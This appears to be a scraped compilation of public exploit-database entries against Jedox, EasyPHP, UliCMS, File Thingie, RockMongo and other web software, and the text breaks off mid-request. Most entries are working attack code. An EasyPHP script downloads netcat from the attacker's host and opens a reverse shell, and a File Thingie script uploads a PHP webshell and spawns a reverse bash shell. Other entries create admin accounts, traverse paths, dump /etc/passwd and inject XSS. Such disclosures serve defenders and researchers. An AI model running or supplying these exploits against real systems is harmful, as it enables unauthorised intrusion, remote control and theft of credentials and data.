ISHACK AI BOT

# Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path # Date: 28/04/2023 # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL # Vendor Homepage: https://jedox.com # Version: Jedox 2020.2 (20.2.5) and older # CVE : CVE-2022-47878 Introduction ================= Incorrect input validation for the default storage path variable in the settings page allows remote, authenticated users to specify the location as web root directory. Consecutive file uploads can lead to the execution of arbitrary code. To exploit the vulnerability, the attacker sets the default storage path to the web root. Write-Up ================= See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability. Proof of Concept ================= 1) In the UI in the application settings page the default storage path can be set to any value. This path could be set as the webroot directory of the webserver e.g. /htdocs/app/docroot/. 2) Then any upload/import function can be used to upload a .php webshell file to the webroot. 3) Execute webshell from the webroot directory to obtain RCE.

# Exploit Title: Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module # Date: 28/04/2023 # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL # Vendor Homepage: https://jedox.com # Version: Jedox 2020.2 (20.2.5) and older # CVE : CVE-2022-47877 Introduction ================= A Stored cross-site scripting vulnerability allows remote authenticated users to inject arbitrary web scripts or HTML in the logs page via the log module. To exploit the vulnerability, the attacker must append an XSS payload to the log message. Write-Up ================= See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability. Proof of Concept ================= 1) Store log entry with XSS payload: PATH: /ub/ccmd METHOD: POST BODY: [ [ "log", "error", "<img src=# onerror=\"alert('XSS')\">" ] ] 2) Trigger XSS payload by opening the Logs page and showing the respective log entry.

# Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts # Date: 28/04/2023 # Exploit Author: Syslifters - Christoph Mahrl, Aron Molnar, Patrick Pirker and Michael Wedl # Vendor Homepage: https://jedox.com # Version: Jedox 2020.2 (20.2.5) and older # CVE : CVE-2022-47876 Introduction ================= Jedox Integrator allows remote authenticated users to create Jobs to execute arbitrary code via Groovy-scripts. To exploit the vulnerability, the attacker must be able to create a Groovy-Job in Integrator. Write-Up ================= See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability. Proof of Concept ================= 1) A user with appropriate permissions can create Groovy jobs in the Integrator with arbitrary script code. Run the following groovy script to execute `whoami`. The output of the command can be viewed in the logs: def sout = new StringBuilder(), serr = new StringBuilder() def proc = 'whoami'.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(10000) LOG.error(sout.toString()); LOG.error(serr.toString());

# Exploit Title: Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls # Date: 28/04/2023 # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL # Vendor Homepage: https://jedox.com # Version: Jedox 2020.2 (20.2.5) and older # CVE : CVE-2022-47874 Introduction ================= Improper access controls in `/tc/rpc` allows remote authenticated users to view details of database connections via the class `com.jedox.etl.mngr.Connections` and the method `getGlobalConnection`. To exploit the vulnerability, the attacker must know the name of the database connection. Write-Up ================= See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability. Proof of Concept ================= 1) List all available database connections via `conn::ls` (see also: CVE-2022-47879): PATH: /be/rpc.php METHOD: POST BODY: [ [ "conn", "ls", [ null, false, true, [ "type", "active", "description" ] ] ] ] 2) Retrieve details of a database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`: PATH: /tc/rpc METHOD: POST BODY: [ [ "com.jedox.etl.mngr.Connections", "getGlobalConnection", [ "<CONNECTION>" ] ] ]

# Exploit Title: EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and Path Traversal) # Discovery by: Rafael Pedrero # Discovery Date: 2022-02-06 # Vendor Homepage: https://www.easyphp.org/ # Software Link : https://www.easyphp.org/ # Tested Version: 14.1 # Tested on: Windows 7 and 10 # Vulnerability Type: Remote Command Execution (RCE) CVSS v3: 9.8 CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CWE: CWE-78 Vulnerability description: There is an OS Command Injection in EasyPHP Webserver 14.1 that allows an attacker to achieve Remote Code Execution (RCE) with administrative privileges. Proof of concept: To detect: POST http://127.0.0.1:10000/index.php?zone=settings HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 28 Origin: http://127.0.0.1:10000 Connection: keep-alive Referer: http://127.0.0.1:10000/index.php?zone=settings Host: 127.0.0.1:10000 app_service_control=calc.exe The calculator opens. Exploit: # !/usr/bin/python3 import requests import sys if len(sys.argv) != 5: print("RCE: EasyPHP Webserver 14.1 and before - by Rafa") print("Usage: %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>" % sys.argv[0]) print("Example: %s 192.168.1.10 10000 192.168.1.11 9001" % sys.argv[0]) exit(1) else: target = sys.argv[1] targetport = sys.argv[2] localip = sys.argv[3] localport = sys.argv[4] # python3 -m http.server / python2 -m SimpleHTTPServer with nc.exe in the directory payload = "powershell+-command+\"((new-object+System.Net.WebClient).DownloadFile('http://" + localip + ':8000' + "/nc.exe','%TEMP%\\nc.exe'))\";\"c:\windows\\system32\\cmd.exe+/c+%TEMP%\\nc.exe+" + localip + "+" + localport + "+-e+cmd.exe\"" print (payload) url = 'http://' + target + ':' + targetport + '/index.php?zone=settings' headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4433.0 Safari/537.36" } data = {'app_service_control':payload} try: r = requests.post(url, headers=headers, data=data) except requests.exceptions.ReadTimeout: print("The payload has been sent. Check it!") pass # Vulnerability Type: Path Traversal CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N CWE: CWE-22 Vulnerability description: An issue was discovered in EasyPHP Webserver 14.1. An Absolute Path Traversal vulnerability in / allows remote users to bypass intended SecurityManager restrictions and download any file if you have adequate permissions outside the documentroot configured on the server. Proof of concept: GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1 Host: 192.168.X.X:10000 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* HTTP/1.1 200 OK Host: 192.168.X.X:10000 Connection: close Content-Type: application/octet-stream Content-Length: 499 ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMCDLLNAME=mapi.dll CMC=1 MAPIX=1 MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo 3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo

# Exploit Title: Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks # Date: 28/04/2023 # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL # Vendor Homepage: https://jedox.com # Version: Jedox 2022.4 (22.4.2) and older # CVE : CVE-2022-47880 Introduction ================= An information disclosure vulnerability in `/be/rpc.php` allows remote authenticated users with the appropriate permissions to modify database connections to disclose the clear text credentials via the `test connection` function. To exploit the vulnerability, the attacker must set the host of the database connection to a server under his control. Write-Up ================= See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability. Proof of Concept ================= 1) The host part of a database connection can be changed in the connections details in the UI. Set the Host to a server that you control. 2) Test the database connection. 3) The webserver initiates a connection to the server that you control. Use wireshark to capture network traffic and to ultimately extract the database credentials.

#Exploit Title: Ulicms 2023.1 sniffing-vicuna - Privilege escalation #Application: Ulicms #Version: 2023.1-sniffing-vicuna #Bugs: Privilege escalation #Technology: PHP #Vendor URL: https://en.ulicms.de/ #Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip #Date of found: 04-05-2023 #Author: Mirabbas Ağalarov #Tested on: Linux ##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna import requests new_name=input("name: ") new_email=input("email: ") new_pass=input("password: ") url = "http://localhost/dist/admin/index.php" headers = {"Content-Type": "application/x-www-form-urlencoded"} data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language=" response = requests.post(url, headers=headers, data=data) if response.status_code == 200: print("Request is success and created new admin account") else: print("Request is failure.!!")

# Exploit Title: Online Pizza Ordering System 1.0 - Unauthenticated File Upload # Date: 03/05/2023 # Exploit Author: URGAN # Vendor Homepage: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip # Version: v1.0 # Tested on: LAMP Fedora Server 27 (Twenty Seven) Apache/2.4.34 (Fedora) 10.2.19-MariaDB PHP 7.1.23 # CVE: CVE-2023-2246 #!/usr/bin/env python3 # coding: utf-8 import os import requests import argparse from bs4 import BeautifulSoup # command line arguments parser = argparse.ArgumentParser() parser.add_argument('-u', '--url', type=str, help='URL with http://') parser.add_argument('-p', '--payload', type=str, help='PHP webshell') args = parser.parse_args() # if no arguments are passed, ask the user for them if not (args.url and args.payload): args.url = input('Enter URL with http://: ') args.payload = input('Enter file path PHP webshell: ') # URL Variables url = args.url + '/admin/ajax.php?action=save_settings' img_url = args.url + '/assets/img/' filename = os.path.basename(args.payload) files = [ ('img',(filename,open(args.payload,'rb'),'application/octet-stream')) ] # send a POST request to the server resp_upl = requests.post(url, files = files) status_code = resp_upl.status_code if status_code == 200: print('[+] File uploaded') else: print(f'[-] Error {status_code}: {resp_upl.text}') raise SystemExit(f'[-] Script stopped due to error {status_code}.') # send a GET request to the server resp_find = requests.get(img_url) # Use BeautifulSoup to parse the page's HTML code soup = BeautifulSoup(resp_find.text, 'html.parser') # get all <a> tags on a page links = soup.find_all('a') # list to store found files found_files = [] # we go through all the links and look for the desired file by its name for link in links: file_upl = link.get('href') if file_upl.endswith(filename): # uploaded file name print('[+] Uploaded file found:', file_upl) file_url = img_url + file_upl # get the full URL of your file found_files.append(file_url) # add the file to the list of found files # if the list is not empty, then display all found files if found_files: print('[+] Full URL of your file:') for file_url in found_files: print('[+] ' + file_url) else: print('[-] File not found')

# Exploit Title: Codigo Markdown Editor v1.0.1 (Electron) - Arbitrary Code Execution # Date: 2023-05-03 # Exploit Author: 8bitsec # Vendor Homepage: https://alfonzm.github.io/codigo/ # Software Link: https://github.com/alfonzm/codigo-app # Version: 1.0.1 # Tested on: [Mac OS 13] Release Date: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D 2023-05-03 Product & Service Introduction: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D A Markdown editor & notes app made with Vue & Electron Technical Details & Description: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D A vulnerability was discovered on Codigo markdown editor v1.0.1 allowing a = user to execute arbitrary code by opening a specially crafted file. Proof of Concept (PoC): =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Arbitrary code execution: Create a markdown file (.md) in any text editor and write the following pay= load: <video><source onerror=3D"alert(require('child_process').execSync('/System/= Applications/Calculator.app/Contents/MacOS/Calculator').toString());"> Opening the file in Codigo will auto execute the Calculator application.

#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE) #Application: Ulicms #Version: 2023.1-sniffing-vicuna #Bugs: RCE #Technology: PHP #Vendor URL: https://en.ulicms.de/ #Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip #Date of found: 04-05-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Login to account and edit profile. 2.Upload new Avatar 3. It is possible to include the php file with the phar extension when uploading the image. Rce is triggered when we visit it again. File upload error may occur, but this does not mean that the file is not uploaded and the file location is shown in the error payload: <?php echo system("cat /etc/passwd"); ?> poc request : POST /dist/admin/index.php HTTP/1.1 Host: localhost Content-Length: 1982 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYB7QS1BMMo1CXZVy User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/dist/admin/index.php?action=admin_edit&id=12&ref=home Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv Connection: close ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="csrf_token" e2d428bc0585c06c651ca8b51b72fa58 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="sClass" UserController ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="sMethod" update ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="avatar"; filename="salam.phar" Content-Type: application/octet-stream <?php echo system("cat /etc/passwd"); ?> ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="edit_admin" edit_admin ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="id" 12 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="firstname" account1 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="lastname" account1 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="email" [email protected] ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="password" ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="password_repeat" ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="group_id" 1 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="secondary_groups[]" 1 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="homepage" ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="html_editor" ckeditor ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="admin" 1 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="default_language" ------WebKitFormBoundaryYB7QS1BMMo1CXZVy Content-Disposition: form-data; name="about_me" ------WebKitFormBoundaryYB7QS1BMMo1CXZVy-- response: Error GmagickException: No decode delegate for this image format (/var/www/html/dist/content/tmp/645364e62615b.phar) in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:67 Stack trace: #0 /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php(67): Gmagick->__construct() #1 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open() #2 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar() #3 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar() #4 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost() #5 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand() #6 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods() #7 {main} Next Imagine\Exception\RuntimeException: Unable to open image /var/www/html/dist/content/tmp/645364e62615b.phar in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:73 Stack trace: #0 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open() #1 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar() #2 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar() #3 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost() #4 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand() #5 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods() #6 {main} 4. Go to /var/www/html/dist/content/tmp/645364e62615b.phar (http://localhost/dist/content/tmp/645364e62615b.phar)

#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS) #Application: Ulicms #Version: 2023.1-sniffing-vicuna #Bugs: Stored Xss #Technology: PHP #Vendor URL: https://en.ulicms.de/ #Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip #Date of found: 04-05-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Go to media then to file (http://localhost/dist/admin/index.php?action=files) 2. upload malicious svg file svg file content ===> <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> poc request: POST /dist/admin/fm/upload.php HTTP/1.1 Host: localhost Content-Length: 663 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABCl X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 sec-ch-ua-platform: "Linux" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/dist/admin/fm/dialog.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: last_position=%2F; 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv Connection: close ------WebKitFormBoundaryK3CvcSs8xZwzABCl Content-Disposition: form-data; name="fldr" ------WebKitFormBoundaryK3CvcSs8xZwzABCl Content-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> ------WebKitFormBoundaryK3CvcSs8xZwzABCl-- 3. Go to http://localhost/dist/content/SVG_XSS.svg

#!/usr/bin/python # Exploit Title: File Thingie 2.5.7 - Arbitary File Upload to RCE # Google Dork: N/A # Date: 27th of April, 2023 # Exploit Author: Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt) # Software Link: https://github.com/leefish/filethingie # Version: 2.5.7 # Tested on: N/A # CVE: N/A # Vulnerability originally discovered / published by Cakes # Reference: https://www.exploit-db.com/exploits/47349 # Run a local listener on your machine and you're good to go import os import argparse import requests import random import string import zipfile from urllib.parse import urlsplit, urlunsplit, quote class Exploit: def __init__(self, target, username, password, lhost, lport): self.target = target self.username = username self.password = password self.lhost = lhost self.lport = lport def try_login(self) -> bool: self.session = requests.Session() post_body = {"ft_user": f"{self.username}", "ft_pass": f"{self.password}", "act": "dologin"} response = self.session.post(self.target, data=post_body) if response.status_code == 404: print(f"[-] 404 Not Found - The requested resource {self.target} was not found") return False elif response.status_code == 200: if "Invalid username or password" in response.text: print(f"[-] Invalid username or password") return False return True def create_new_folder(self) -> bool: # Generate random string letters = string.ascii_letters self.payload_filename = "".join(random.choice(letters) for i in range(16)) headers = {"Content-Type": "application/x-www-form-urlencoded"} post_body = {f"type": "folder", "newdir": f"{self.payload_filename}", "act": "createdir", "dir": "", "submit" :"Ok"} print(f"[*] Creating new folder /{self.payload_filename}") response = self.session.post(self.target, headers=headers, data=post_body) if f"index.php?dir=/{self.payload_filename}" in response.text: print(f"[+] Created new folder /{self.payload_filename}") return True else: print(f"[-] Could not create new folder /{self.payload_filename}") return False def create_payload(self) -> bool: try: with zipfile.ZipFile(f"{self.payload_filename}.zip", 'w', compression=zipfile.ZIP_DEFLATED) as zip_file: zip_file.writestr(f"{self.payload_filename}.php", "<?php if(isset($_REQUEST[\'cmd\'])){ echo \"<pre>\"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo \"</pre>\"; die; }?>") print(f"[+] Zipped payload to {self.payload_filename}.zip") return True except: print(f"[-] Could not zip payload to {self.payload_filename}.zip") return False def upload_payload(self) -> bool: # Set up the HTTP headers and data for the request headers = { b'Content-Type': b'multipart/form-data; boundary=---------------------------grimlockx' } post_body = ( '-----------------------------grimlockx\r\n' 'Content-Disposition: form-data; name="localfile-1682513975953"; filename=""\r\n' 'Content-Type: application/octet-stream\r\n\r\n' ) post_body += ( '\r\n-----------------------------grimlockx\r\n' 'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n' '2000000\r\n' '-----------------------------grimlockx\r\n' f'Content-Disposition: form-data; name="localfile"; filename="{self.payload_filename}.zip"\r\n' 'Content-Type: application/zip\r\n\r\n' ) # Read the zip file contents and append them to the data with open(f"{self.payload_filename}.zip", "rb") as f: post_body += ''.join(map(chr, f.read())) post_body += ( '\r\n-----------------------------grimlockx\r\n' 'Content-Disposition: form-data; name="act"\r\n\r\n' 'upload\r\n' '-----------------------------grimlockx\r\n' 'Content-Disposition: form-data; name="dir"\r\n\r\n' f'/{self.payload_filename}\r\n' '-----------------------------grimlockx\r\n' 'Content-Disposition: form-data; name="submit"\r\n\r\n' 'Upload\r\n' '-----------------------------grimlockx--\r\n' ) print("[*] Uploading payload to the target") response = self.session.post(self.target, headers=headers, data=post_body) if f"<a href=\"./{self.payload_filename}/{self.payload_filename}.zip\" title=\"Show {self.payload_filename}.zip\">{self.payload_filename}.zip</a>" in response.text: print("[+] Uploading payload successful") return True else: print("[-] Uploading payload failed") return False def get_base_url(self) -> str: url_parts = urlsplit(self.target) path_parts = url_parts.path.split('/') path_parts.pop() base_url = urlunsplit((url_parts.scheme, url_parts.netloc, '/'.join(path_parts), "", "")) return base_url def unzip_payload(self) -> bool: print("[*] Unzipping payload") headers = {"Content-Type": "application/x-www-form-urlencoded"} post_body = {"newvalue": f"{self.payload_filename}.zip", "file": f"{self.payload_filename}.zip", "dir": f"/{self.payload_filename}", "act": "unzip"} response = self.session.post(f"{self.target}", headers=headers, data=post_body) if f"<p class='ok'>{self.payload_filename}.zip unzipped.</p>" in response.text: print("[+] Unzipping payload successful") print(f"[+] You can now execute commands by browsing {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>") return True else: print("[-] Unzipping payload failed") return False def execute_payload(self) -> bool: print("[*] Trying to get a reverse shell") cmd = quote(f"php -r \'$sock=fsockopen(\"{self.lhost}\",{self.lport});system(\"/bin/bash <&3 >&3 2>&3\");\'") print("[*] Executing payload") response = self.session.get(f"{self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd={cmd}") print("[+] Exploit complete") return True def cleanup_local_files(self) -> bool: if os.path.exists(f"{self.payload_filename}.zip"): os.remove(f"{self.payload_filename}.zip") print("[+] Cleaned up zipped payload on local machine") return True print("[-] Could not clean up zipped payload on local machine") return False if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-t", "--target", dest="target", type=str, required=True, help="Target URL to ft2.php") parser.add_argument("-u", "--username", dest="username", type=str, required=True, help="FileThingie username") parser.add_argument("-p", "--password", dest="password", type=str, required=True, help="FileThingie password") parser.add_argument("-L", "--LHOST", dest="lhost", type=str, required=True, help="Local listener ip") parser.add_argument("-P", "-LPORT", dest="lport", type=int, required=True, help="Local listener port") args = parser.parse_args() exploit = Exploit(args.target, args.username, args.password, args.lhost, args.lport) exploit.try_login() exploit.create_new_folder() exploit.create_payload() exploit.upload_payload() exploit.unzip_payload() exploit.execute_payload() exploit.cleanup_local_files()

# Exploit Title: RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS) # Discovery by: Rafael Pedrero # Discovery Date: 2020-09-19 # Vendor Homepage: https://github.com/iwind/rockmongo/ # Software Link : https://github.com/iwind/rockmongo/ # Tested Version: 1.1.7 # Tested on: Windows 7 and 10 # Vulnerability Type: Stored Cross-Site Scripting (XSS) CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: RockMongo v1.1.7, does not sufficiently encode user-controlled inputs, resulting in a stored and reflected Cross-Site Scripting (XSS) vulnerability via the index.php, in multiple parameter. Proof of concept: Stored: POST https://localhost/mongo/index.php?action=db.newCollection&db=local HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 69 Origin: https://localhost Connection: keep-alive Referer: https://localhost/mongo/index.php?action=db.newCollection&db=local Cookie: PHPSESSID=jtjuid60sv6j3encp3cqqps3f7; ROCK_LANG=es_es; rock_format=json Upgrade-Insecure-Requests: 1 Host: localhost name=%09%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&size=0&max=0 Reflected: https://localhost/mongo/index.php?action=collection.index&db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log https://localhost/mongo/index.php?action=collection.index&db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E https://localhost/mongo/index.php?action=db.index&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E http://localhost/mongo/index.php?db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll http://localhost/mongo/index.php?db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll http://localhost/mongo/index.php?db=local&collection=startup_log&action=collection.index&format=%27+onMouseOver%3D%27alert%281%29%3B&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll POST http://localhost/mongo/index.php?action=login.index&host=0 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 109 Origin: https://localhost Authorization: Basic cm9vdDpyb290 Connection: keep-alive Referer: 